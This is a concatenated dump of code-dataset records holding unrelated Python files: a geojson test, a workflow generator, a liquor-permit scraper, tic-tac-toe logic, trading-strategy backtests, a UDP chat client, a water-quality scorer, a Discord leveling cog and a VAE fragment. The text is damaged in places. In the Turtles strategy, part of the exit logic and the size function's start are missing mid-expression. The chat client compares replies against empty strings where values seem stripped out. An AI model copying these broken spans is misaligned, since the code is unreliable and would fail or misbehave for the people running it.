'data should be in json_row')\n self.assertTrue('Longitude' in dataset['json_row']['data'], 'data.Longitude should be in json_row')\n\n # ensure that we can map the Lat/Long to geojson, as this json has\n # unicode values for Lat/Long\n\n # update the minerva metadata with coordinate mapping\n metadata = {'minerva': dataset}\n metadata['minerva']['mapper'] = {\n \"latitudeKeypath\": \"data.Latitude\",\n \"longitudeKeypath\": \"data.Longitude\"\n }\n\n path = '/item/{}/metadata'.format(dataset['dataset_id'])\n response = self.request(\n path=path,\n method='PUT',\n user=self._user,\n body=json.dumps(metadata),\n type='application/json'\n )\n metadata = response.json\n\n # create geojson in the dataset\n path = '/minerva_dataset/{}/geojson'.format(dataset['dataset_id'])\n response = self.request(\n path=path,\n method='POST',\n user=self._user,\n )\n self.assertHasKeys(response.json, ['geojson_file'])\n","sub_path":"plugin_tests/analysis_test.py","file_name":"analysis_test.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"164505475","text":"#!/usr/bin/python2\n\nfrom DAX3 import *\n\nt = \"write1\"\n\nname1 = \"iotester_{}_{}M\".format(t, 1)\nname10 = \"iotester_{}_{}M\".format(t, 10)\nname100 = \"iotester_{}_{}M\".format(t, 100)\n\npname1 = \"iotester_{}p_{}M\".format(t, 1)\npname10 = \"iotester_{}p_{}M\".format(t, 10)\npname100 = \"iotester_{}p_{}M\".format(t, 100)\n\ndag1 = ADAG(name1)\ndag10 = ADAG(name10)\ndag100 = ADAG(name100)\n\npdag1 = ADAG(pname1)\npdag10 = ADAG(pname10)\npdag100 = ADAG(pname100)\n\nclear1 = ADAG(\"clear_write1_1M\")\nclear10 = ADAG(\"clear_write1_10M\")\nclear100 = ADAG(\"clear_write1_100M\")\n\ntouch1 = ADAG(\"touch_write1_1M\")\ntouch10 = ADAG(\"touch_write1_10M\")\ntouch100 = ADAG(\"touch_write1_100M\")\n\n\nfor i in range(1, 16384 + 1):\n\n if i <= 2048:\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name100, i, 100))\n dag100.addJob(j)\n pdag100.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name100, i))\n clear100.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name100, i))\n touch100.addJob(j)\n\n if i <= 8192:\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name10, i, 10))\n dag10.addJob(j)\n pdag10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name10, i))\n clear10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name10, i))\n touch10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name1, i, 1))\n dag1.addJob(j)\n pdag1.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name1, i))\n clear1.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name1, i))\n touch1.addJob(j)\n\n\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name1),\"w\")\ndag1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name10),\"w\")\ndag10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name100),\"w\")\ndag100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname1),\"w\")\npdag1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname10),\"w\")\npdag10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname100),\"w\")\npdag100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/clear_write1_1M.dax\",\"w\")\nclear1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/clear_write1_10M.dax\",\"w\")\nclear10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/clear_write1_100M.dax\",\"w\")\nclear100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/touch_write1_1M.dax\",\"w\")\ntouch1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/touch_write1_10M.dax\",\"w\")\ntouch10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/touch_write1_100M.dax\",\"w\")\ntouch100.writeXML(f)\nf.close()\n# f = open(\"/home/rdevries/workflows/prepare_{}.dax\".format(t),\"w\")\n# prepare_dag.writeXML(f)\n# f.close()\n","sub_path":"iotester_write1.py","file_name":"iotester_write1.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"78240955","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 2019-Jun-20 11:35:42\nTICKET NUMBER -AI_296\n@author: muhil\n'''\n\nfrom Data_scuff.extensions.feeds import ExcelFeedSpider\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose\nfrom w3lib.html import remove_tags, replace_escape_chars\nimport scrapy\nfrom Data_scuff.spiders.AI_296.items import WiLiquorLicensesSpiderItem\nfrom Data_scuff.spiders.__common import CustomSettings\nfrom Data_scuff.utils.utils import Utils\nfrom Data_scuff.spiders.__common import DataFormatterMixin,LookupDatareaderMixin\n\n\nclass WiLiquorLicensesSpider(ExcelFeedSpider,DataFormatterMixin,LookupDatareaderMixin):\n name = '296_wi_liquor_licenses'\n allowed_domains = ['wi.gov']\n start_urls = ['https://www.revenue.wi.gov/DORReports/prmitlst.xlsx']\n skiprows=1\n custom_settings = {\n 'FILE_NAME':Utils.getRundateFileName('WiLiquorLicensesSpider'),\n 'JIRA_ID':'AI_296',\n 'DOWNLOAD_DELAY':5,\n 'COOKIES_ENABLED':True,\n 'COOKIES_DEBUG':True,\n 'HTTPCACHE_ENABLED':False,\n # 'JOBDIR' : CustomSettings.getJobDirectory('wi_liquor_licenses'),\n 'TOP_HEADER':{ 'company_name': 'Business Name',\n 'dba_name': '',\n 'location_address_string': 'Business Address+City+State+Zip',\n 'mixed_name': 'Name',\n 'permit_lic_desc': '',\n 'permit_lic_eff_date': 'Commence/ Beginning Effective Date',\n 'permit_lic_exp_date': 'BTR Expiration Date',\n 'permit_subtype': 'Permit Type/ Account Sub-Type',\n 'permit_type': '',\n 'person_phone': 'Phone',\n 'peson_name': 'Contact',\n 'square_footage': 'Sq Footage'},\n 'FIELDS_TO_EXPORT':[ 'peson_name',\n 'person_phone',\n 'mixed_name',\n 'permit_lic_desc',\n 'sourceName',\n 'url',\n 'permit_type',\n 'square_footage',\n 'ingestion_timestamp',\n 'dba_name',\n 'location_address_string',\n 'permit_lic_eff_date',\n 'permit_subtype',\n 'company_name',\n 'permit_lic_exp_date'],\n 'NULL_HEADERS':[]\n }\n\n # Do any adaptations you need here\n #def adapt_response(self, response):\n # return response\n \n def parse(self, response):\n url=['https://www.revenue.wi.gov/DORReports/prmitlst.xlsx','https://www.revenue.wi.gov/DORReports/beer-permit-list.xlsx']\n for link in url:\n yield scrapy.Request(link, callback= self.parse_excel, dont_filter=True,encoding='utf-8')\n\n def parse_row(self, response, row):\n print(row)\n il = ItemLoader(item=WiLiquorLicensesSpiderItem())\n # il.default_input_processor = MapCompose(lambda v: v.strip(), remove_tags, replace_escape_chars)\n\t\t# il.add_value('ingestion_timestamp', Utils.getingestion_timestamp())\n il.add_value('sourceName', 'WI_Liquor_Licenses')\n il.add_value('url', 'https://www.revenue.wi.gov/DORReports/prmitlst.xlsx')\n il.add_value('peson_name', row.get('Contact','') if row.get('Contact','') else '')\n il.add_value('person_phone', row['Phone'])\n il.add_value('mixed_name', row['Name'])\n il.add_value('permit_lic_desc', row[''])\n il.add_value('permit_type', row[''])\n il.add_value('square_footage', row['Sq Footage'])\n il.add_value('dba_name', row[''])\n il.add_value('location_address_string', row['Business Address+City+State+Zip'])\n il.add_value('permit_lic_eff_date', row['Commence/ Beginning Effective Date'])\n il.add_value('permit_subtype',row.get('Permit Type','') if row.get('Permit Type','') else '')\n il.add_value('company_name', row['Business Name'])\n il.add_value('permit_lic_exp_date', row['BTR Expiration Date'])\n return il.load_item()","sub_path":"all_spider/AI_296/wi_liquor_licenses.py","file_name":"wi_liquor_licenses.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"126120204","text":"\nimport random\nimport numpy as np\n\n\n# randomly returns a string with the starting player: 'user' or 'pc'\ndef starting_one():\n players = ['user', 'pc']\n return players[random.randrange(0, 2)]\n\n\n# returns true if the given coordinates match with an empty space in the playground\ndef empty_cell(plg, x, y):\n return plg[x][y] == 0\n\n\n# updates the variable plg filling the position (x,y) with or 1 or -1\ndef update_plg(plg, bi, x, y):\n plg[x][y] = bi\n return plg\n\n\n# returns the name of the winner or an empty string if there is still no winner in the game\ndef who_wins(plg):\n winner = ''\n plg_a = np.array(plg)\n\n if np.trace(plg_a) == 3 or np.trace(np.fliplr(plg_a)) == 3: # checking the diagonals\n winner = 'user'\n elif np.trace(plg_a) == -3 or np.trace(np.fliplr(plg_a)) == -3:\n winner = 'pc'\n else:\n for i in range(3): # before 'or': check X axis, after check Y axis) x3 (rows/columns)\n if plg_a.sum(axis=1)[i] == 3 or plg_a.sum(axis=0)[i] == 3:\n winner = 'user'\n break\n elif plg_a.sum(axis=1)[i] == -3 or plg_a.sum(axis=0)[i] == -3:\n winner = 'pc'\n break\n else:\n winner = ''\n\n return winner\n\n\n# asks the user for the x,y coordinates of his/her move, checks if x,y are inside the playground and return them.\ndef user_move():\n options = ['1', '2', '3']\n choosen_x = ''\n choosen_y = ''\n while choosen_x not in options:\n # check if its an integer\n choosen_x = input(\"Indicate de X coordinate of your move (1,2,3)\")\n while choosen_y not in options:\n # check if its an integer\n choosen_y = input(\"Indicate de Y coordinate of your move (1,2,3)\")\n\n return int(choosen_x) - 1, int(choosen_y) - 1\n\n\n# This function does the pc strategic move (included the check for empty cells)\ndef pc_move(plg):\n global found\n\n # attaking ->> looking for alignment of two '-1' and putting the third\n found = False\n plg_a = np.array(plg)\n\n if np.trace(plg_a) == -2: # checking oportunity in diagonal\n found = True\n if plg[0][0] == 0:\n return 0, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 2, 2\n elif np.trace(np.fliplr(plg_a)) == -2: # checking oportunity in other diagonal\n found = True\n if plg[2][0] == 0:\n return 2, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 0, 2\n else:\n for i in range(3):\n if plg_a.sum(axis=1)[i] == -2: # checking opportunity in horitzontal (x3 rows)\n found = True\n if plg[i][0] == 0:\n return i, 0\n break\n elif plg[i][1] == 0:\n return i, 1\n break\n else:\n return i, 2\n break\n elif plg_a.sum(axis=0)[i] == -2: # checking opportunity in vertical (x3 columns)\n found = True\n if plg[0][i] == 0:\n return 0, i\n break\n elif plg[1][i] == 0:\n return 1, i\n break\n else:\n return 2, i\n break\n\n # defending ->> looking for alignment of two '1' and blocking the third\n if np.trace(plg_a) == 2: # checking oportunity in diagonal\n found = True\n if plg[0][0] == 0:\n return 0, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 2, 2\n elif np.trace(np.fliplr(plg_a)) == 2: # checking oportunity in other diagonal\n found = True\n if plg[2][0] == 0:\n return 2, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 0, 2\n else:\n for i in range(3):\n if plg_a.sum(axis=1)[i] == 2: # checking opportunity in horitzontal (x3 rows)\n found = True\n if plg[i][0] == 0:\n return i, 0\n break\n elif plg[i][1] == 0:\n return i, 1\n break\n else:\n return i, 2\n break\n elif plg_a.sum(axis=0)[i] == 2: # checking opportunity in vertical (x3 columns)\n found = True\n if plg[0][i] == 0:\n return 0, i\n break\n elif plg[1][i] == 0:\n return 1, i\n break\n else:\n return 2, i\n break\n\n # There's no opportunity to win or block: RANDOM GAME\n if not found:\n pc_x = random.randrange(0, 3)\n pc_y = random.randrange(0, 3)\n while not empty_cell(plg, pc_x, pc_y):\n pc_x = random.randrange(0, 3)\n pc_y = random.randrange(0, 3)\n return pc_x, pc_y\n\n","sub_path":"Project_1_Recoding/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"243215439","text":"from . import indicators, toolFuncs\n\n\n# =============================================================================\n# Previous way to construct strategy\n# def Strategy_AIP(data, K):\n# # automatic investment plan\n# l = len(data['Close'])\n# trade_signal = []\n# single = 10000/(l//K+(l%K>0))\n# \n# n = 1\n# for i in range(l):\n# if i % K == 0:\n# trade_signal.append((single, 'value','vary'))\n# n += 1\n# else:\n# trade_signal.append(None) \n# \n# stock_shares, asset = toolFuncs.backtest(data, trade_signal)\n# output = {} \n# output['asset'] = {'name': 'return', 'data': asset, 'position': 'bottom1',\n# 'type': 'line'}\n# #toolFuncs.MaximumDrawdown(asset) \n# output['stock_shares'] = {'name': 'position', 'data': stock_shares, 'position': 'bottom2', 'type': 'bar'}\n# return output\n# =============================================================================\n\ndef Strategy_SIP(data, K):\n '''\n Systematic Investment Plan\n Invest a certain amount of money every K units of time\n About 10000 cash(initial number) will be invested at the end\n '''\n l = len(data['Close'])\n single = 10000/(l//K+(l%K>0))\n infoDic1 = {'close': data['Close'], 'single': single}\n @toolFuncs.OrderTypeEntry \n def Entry(infoDic, asset, orders, i):\n if i == 0:\n return {'amount': infoDic['single'],\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]} \n \n infoDic2 = {'close': data['Close'], 'single': single, 'K': K}\n @toolFuncs.OrderTypeSize\n def Size(infoDic, asset, orders, i):\n if i != 0 and i % infoDic['K'] == 0:\n return {'amount': infoDic['single'],\n 'amount_type': 'value', 'change_type': 'vary',\n 'order_price': infoDic['close'][i]} \n \n infoDic_EndExit = {'L': len(data['Close']) - 1, 'close': data['Close']} \n @toolFuncs.OrderTypeExit\n def EndExit(infoDic, asset, orders, i):\n if i == infoDic['L']:\n return {'amount': 0,\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]}\n functions = [(Entry, infoDic1), (Size, infoDic2), (EndExit, infoDic_EndExit)]\n\n return toolFuncs.GetOutput(data, functions)\n\n\ndef Strategy_Turtles(data):\n '''\n A trading system taught by Richard Dennis\n N: exponential average of true range, measures volatility, used to determine trading unit, level of stop price, etc.\n Richard Donchian's Channel breakout system is used here\n Entry when 20 days breakout happens(system1)\n Entry system1 is ignored when last trade exits with profit\n Entry when 55 days breakout happens(system2)\n Stop loss at 2N below the latest entry price\n Exit when the opposite 10 days breakout happens(system1)\n Exit when the opposite 20 days breakout happens(system2)\n Add unit at 1/2 N price following the entry\n Position size is controlled by N\n '''\n # calculate N\n N = [None]\n N.extend(toolFuncs.EMA(indicators.TrueRange(data)['tr']['data'][1:], 39))\n # entry system1\n PrecedingHighs20 = indicators.PrecedingHighLow(data, 20)['high']['data']\n PrecedingLows20 = indicators.PrecedingHighLow(data, 20)['low']['data'] \n # entry system2\n PrecedingHighs55 = indicators.PrecedingHighLow(data, 55)['high']['data']\n PrecedingLows55 = indicators.PrecedingHighLow(data, 55)['low']['data'] \n # infoDic: calculated results from data\n\n infoDic2 = {'PrecedingHighs55': PrecedingHighs55, 'PrecedingLows55': PrecedingLows55,\n 'N': N, 'high': data['High'], 'low': data['Low'], 'open': data['Open']} \n @toolFuncs.OrderTypeEntry \n def entry_func2(infoDic, asset, orders, i):\n # entry condition\n if infoDic['N'][i]: \n # entry system2\n if infoDic['PrecedingHighs55'][i] and infoDic['high'][i] > infoDic['PrecedingHighs55'][i]:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': max(infoDic['PrecedingHighs55'][i], infoDic['open'][i])} \n if infoDic['PrecedingLows55'][i] and infoDic['low'][i] < infoDic['PrecedingLows55'][i]:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': min(infoDic['PrecedingLows55'][i], infoDic['open'][i])} \n return None\n \n infoDic1 = {'PrecedingHighs20': PrecedingHighs20, 'PrecedingLows20': PrecedingLows20,\n 'N': N, 'high': data['High'], 'low': data['Low'], 'open': data['Open']}\n @toolFuncs.OrderTypeEntry \n def entry_func1(infoDic, asset, orders, i):\n # entry condition\n if infoDic['N'][i] and (not orders or orders[-1]['event_type'] == 'stop_func'):\n # entry system1 condition: previous winner trade (with 'exit' other than 'stop')\n # will make it ignored\n if infoDic['PrecedingHighs20'][i] and infoDic['PrecedingHighs20'][i] < infoDic['high'][i]:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': max(infoDic['PrecedingHighs20'][i], infoDic['open'][i])}\n elif infoDic['PrecedingLows20'][i] and infoDic['PrecedingLows20'][i] > infoDic['low'][i]:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': min(infoDic['PrecedingLows20'][i], infoDic['open'][i])}\n\n infoDic3 = {'N': N, 'open': data['Open'], 'low': data['Low'], 'high': data['High']}\n @toolFuncs.OrderTypeExit\n def stop_func(infoDic, asset, orders, i):\n if infoDic['N'][i]:\n position_direction = (asset['position'] > 0) * 2 - 1 # long: 1, short: -1\n target_price = orders[-1]['order_price'] - position_direction * 2 * infoDic['N'][i]\n if position_direction > 0 and infoDic['low'][i] < target_price:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(target_price, infoDic['open'][i])}\n elif position_direction < 0 and infoDic['high'][i] > target_price:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': max(target_price, infoDic['open'][i])}\n return None\n \n PrecedingHighs10 = indicators.PrecedingHighLow(data, 10)['high']['data']\n PrecedingLows10 = indicators.PrecedingHighLow(data, 10)['low']['data'] \n infoDic4 = {'PrecedingHighs20': PrecedingHighs20, 'PrecedingLows20': PrecedingLows20,\n 'PrecedingHighs10': PrecedingHighs10, 'PrecedingLows10': PrecedingLows10,\n 'high': data['High'], 'low': data['Low'], 'open': data['Open']} \n @toolFuncs.OrderTypeExit\n def exit_func(infoDic, asset, orders, i):\n j = 1\n while orders[-j]['event_type'] not in {'entry_func1', 'entry_func2'}:\n j += 1\n trade_entry_type = orders[-j]['event_type'] \n if asset['position'] > 0:\n if trade_entry_type == 'entry_func1' and infoDic['PrecedingLows10'][i] and infoDic['PrecedingLows10'][i]>infoDic['low'][i]:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(infoDic['PrecedingLows10'][i], infoDic['open'][i])} \n if trade_entry_type == 'entry_func2' and infoDic['PrecedingLows20'][i] and infoDic['PrecedingLows20'][i]>infoDic['low'][i]:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(infoDic['PrecedingLows20'][i], infoDic['open'][i])}\n if asset['position'] < 0: \n if trade_entry_type == 'entry_func1' and infoDic['PrecedingHighs10'][i] and infoDic['PrecedingHighs10'][i] 0) * 2 - 1 # long: 1, short: -1\n target_price = orders[-1]['order_price'] + position_direction * 0.5 * infoDic['N'][i]\n \n if position_direction > 0 and infoDic['high'][i] > target_price:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'vary',\n 'order_price': max(target_price, infoDic['open'][i])} \n elif position_direction < 0 and infoDic['low'][i] < target_price:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'vary',\n 'order_price': min(target_price, infoDic['open'][i])} \n return None \n \n infoDic_EndExit = {'L': len(data['Close']) - 1, 'close': data['Close']} \n @toolFuncs.OrderTypeExit\n def EndExit(infoDic, asset, orders, i):\n if i == infoDic['L']:\n return {'amount': 0,\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]} \n functions = [(entry_func1, infoDic1), (entry_func2, infoDic2),\n (stop_func, infoDic3), (exit_func, infoDic4),\n (size_func, infoDic5), (EndExit, infoDic_EndExit)]\n \n return toolFuncs.GetOutput(data, functions)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main/methods/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":10575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"124446614","text":"import socket\nimport threading\n\n\ndef recv_data(sock):\n while True:\n data = sock.recv(1024)\n print('\\r' + data.decode() + '\\n' + 'You: ', end='')\n\n\n\nhost = '127.0.0.1'\nport = int(input('Input port: '))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.connect((host, port))\n\nif not port:\n port = 3000\nelse:\n port = int(port)\n\n\nwhile True:\n nick = input('Input sentence nickname: ')\n nickname = '='+nick\n if nick == 'exit':\n sock.close()\n print('Disconnection')\n break\n\n sock.send(nickname.encode())\n data = sock.recv(1024)\n data = data.decode()\n if data == '':\n print(f'Welcome to the chat!, {nick}')\n break\n elif data == '':\n print(f'Change nickname')\n\n\ntread = threading.Thread(target=recv_data, args=(sock,), daemon=True)\ntread.start()\nsock.send('enter'.encode())\n\nwhile True:\n data = input(f'you: ')\n sock.send(data.encode())\n if data == 'exit':\n sock.close()\n print('Disconnection')\n break\n","sub_path":"client_chat.py","file_name":"client_chat.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201699596","text":"from app import models as app_models\nfrom rawdata import models as rawdata_models\nfrom app import models as app_models\nfrom utils.log import log\n\nclass SDW_Data_Cruncher(object):\n\n\n # major violation for each of the last 12 quarters\n _HISTORICAL_MAX_SCORE = 120.0\n\n # maxium score for a quartor\n _CURRENT_MAX_SCORE = 10.0\n\n _HISTORICAL_SCORE_WEIGHT = 0.4\n _CURRENT_SCORE_WEIGHT = 0.6\n\n _COMMUNITY_WATER_SYSTEM_WEIGHT = 0.6\n _OTHER_WATER_SYSTEM_WEIGHT = 0.4\n\n def __init__(self):\n pass\n\n def _calc_historical_score(self, viopaccr):\n # viopaccr: historical score\n if (viopaccr >= self._HISTORICAL_MAX_SCORE):\n # 1 represents the highest value which equates to the worst water quality in general\n return 1\n\n return viopaccr / self._HISTORICAL_MAX_SCORE\n\n def _calc_current_score(self, voiremain):\n # voiremain current score\n if (voiremain >= self._CURRENT_MAX_SCORE ):\n return 1\n\n return voiremain / self._CURRENT_MAX_SCORE\n\n def _calc_facility_score(self, viopaccr , voiremain, pop_served):\n historical_score = self._calc_historical_score(viopaccr)\n current_score = self._calc_current_score(voiremain)\n\n return (historical_score * self._HISTORICAL_SCORE_WEIGHT) + (current_score * self._CURRENT_SCORE_WEIGHT)\n\n def _pws_type_score(self, systems):\n # for every facility there is one system\n cws_score = 0\n cws_population = 0\n other_population = 0\n other_score = 0\n for system in systems:\n if (system.PWSTypeCode == 'cws' ):\n cws_population += system.PopulationServedCount\n cws_score += self._calc_facility_score(system.Viopaccr, system.Vioremain, system.PopulationServedCount) * system.PopulationServedCount\n else:\n other_population += system.PopulationServedCount\n other_score += self._calc_facility_score(system.Viopaccr, system.Vioremain, system.PopulationServedCount) * system.PopulationServedCount\n\n\n if cws_population:\n cumulative_cws_score = (cws_score / cws_population) * self._COMMUNITY_WATER_SYSTEM_WEIGHT\n else:\n cumulative_cws_score = 0\n\n if other_population:\n cumlative_other_score = (other_score / other_population) * self._OTHER_WATER_SYSTEM_WEIGHT\n else:\n cumlative_other_score = 0\n\n return ( cumulative_cws_score, cumlative_other_score )\n\n def _calc_area_score(self, county_fips):\n # single area represent a zipcode\n areas = []\n\n systems = rawdata_models.EpaWaterSystem.objects.filter( FIPSCodes__contains = county_fips )\n cws_score, other_score = self._pws_type_score(systems)\n\n return cws_score + other_score\n\n def calc_state_scores(self, state, print_test = False):\n areas = []\n\n if print_test:\n log('state: %s' % (state), 'success')\n\n for location in app_models.location.objects.filter( state = state).exclude(fips_county = ''):\n score = self._calc_area_score(location.fips_county)\n areas.append({\n 'county_fips': location.fips_county,\n 'score': score\n })\n\n if print_test:\n log('%s: %s' % (location.fips_county, round(score, 3)), 'success')\n\n return areas\n","sub_path":"utils/epa/sdw_data_cruncher.py","file_name":"sdw_data_cruncher.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"144487273","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import CommandNotFound\r\nfrom discord.utils import get\r\nimport asyncio\r\nimport random\r\nimport time\r\nimport os\r\nimport requests\r\nimport json\r\nimport re\r\ndef save(savemap, file):\r\n with open(file, \"w\") as f:\r\n json.dump(savemap, f)\r\ndef load(file):\r\n with open(file) as f:\r\n loadmap = json.load(f)\r\n return loadmap\r\n\r\nclass leveling(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n async def levels(self, ctx):\r\n toplist = []\r\n people = load(\"members.json\")\r\n toplist = [[player, stats[\"level\"]*1000+stats[\"xp\"]] for player, stats in people.items()]\r\n toplist = sorted(toplist, key=lambda x: x[1], reverse=True)\r\n top1 = f\"<@{toplist[0][0]}> XP: {str(toplist[0][1])}\"\r\n top2 = f\"<@{toplist[1][0]}> XP: {str(toplist[1][1])}\"\r\n top3 = f\"<@{toplist[2][0]}> XP: {str(toplist[2][1])}\"\r\n top4 = f\"<@{toplist[3][0]}> XP: {str(toplist[3][1])}\"\r\n top5 = f\"<@{toplist[4][0]}> XP: {str(toplist[4][1])}\"\r\n embed=discord.Embed(title=\"Leaderboard\", description=f'''The top 5 scoring members!\r\n #1 {top1}\r\n #2 {top2}\r\n #3 {top3}\r\n #4 {top4}\r\n #5 {top5}''')\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command()\r\n @commands.has_permissions(administrator=True)\r\n async def xp(self, ctx, cmd=None, member: discord.Member=None, arg2=None):\r\n if cmd == None:\r\n await ctx.send('''Xp Commands:\r\n xp set set a players xp\r\n xp level set a players level''')\r\n else:\r\n people = load(\"members.json\")\r\n name = str(member.id)\r\n person = people[name]\r\n if cmd == \"set\":\r\n person[\"xp\"] = int(arg2)\r\n await ctx.send(f'''Set {member.mention}'s xp to {arg2}''')\r\n save(people, \"members.json\")\r\n if cmd == \"level\":\r\n person[\"level\"] = int(arg2)\r\n await ctx.send(f'''Set {member.mention}'s level to {arg2}''')\r\n save(people, \"members.json\")\r\n\r\n @commands.command()\r\n async def rank(self, ctx, target: discord.Member = None):\r\n if target == None:\r\n people = load(\"members.json\")\r\n person = people[str(ctx.author.id)]\r\n embed=discord.Embed(title=f\"**Rank For {ctx.author}**\", description=f'''Level: {person[\"level\"]} Xp: {person[\"xp\"]}/1000''', color=0x00e4f5)\r\n await ctx.send(embed=embed)\r\n else:\r\n people = load(\"members.json\")\r\n person = people[str(target.id)]\r\n embed=discord.Embed(title=f\"**Rank For {target}**\", description=f'''Level: {person[\"level\"]} Xp: {person[\"xp\"]}/1000''', color=0x00e4f5)\r\n await ctx.send(embed=embed)\r\n \r\n @commands.Cog.listener()\r\n async def on_message(self, message):\r\n if message.author.bot:\r\n return\r\n name = str(message.author.id)\r\n people = load(\"members.json\")\r\n if name in people:\r\n person = people[name]\r\n person[\"name\"] = message.author.name\r\n person[\"tag\"] = message.author.discriminator\r\n earned = random.randint(1, 25)\r\n person[\"xp\"] = person[\"xp\"]+earned\r\n if message.content.startswith(\"!rank\"):\r\n person[\"xp\"] = person[\"xp\"]-earned\r\n # add a level if they reached levelup xp\r\n if person[\"xp\"] > 1000:\r\n person[\"level\"] = person[\"level\"]+1\r\n person[\"xp\"] = 0\r\n embed=discord.Embed(title=f\"**Level Up!**\", description=f'''Congrats {message.author}, you reached level {person[\"level\"]}!''', color=0x00e4f5)\r\n await message.channel.send(embed=embed)\r\n save(people, \"members.json\")\r\n else:\r\n people[name] = {\"name\" : message.author.name, \"tag\" : message.author.discriminator, \"xp\" : 1, \"level\" : 1}\r\n save(people, \"members.json\")\r\n\r\ndef setup(bot):\r\n bot.add_cog(leveling(bot))","sub_path":"bot/cogs/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"488937348","text":"import numpy as np\n\nfrom keras.layers import Input, Dense, Lambda, Layer\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras import metrics\n\ndef variational_autoencoder(encoding_layer_dim, intermediate_dim1, intermediate_dim2, input_shape, X, X_test):\n x = Input(shape=(input_shape,))\n h1 = Dense(intermediate_dim2, activation='relu')(x)\n h2 = Dense(intermediate_dim1, activation='relu')(h1)\n z_mean = Dense(encoding_layer_dim, activation='relu')(h2)\n z_log_var = Dense(encoding_layer_dim, activation='relu')(h2)\n \n def sampling(args):\n z_mean, z_log_var = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], encoding_layer_dim), mean=0.,\n stddev=1.)\n return z_mean + K.exp(z_log_var / 2) * epsilon\n \n # note that \"output_shape\" isn't necessary with the TensorFlow backend\n z = Lambda(sampling, 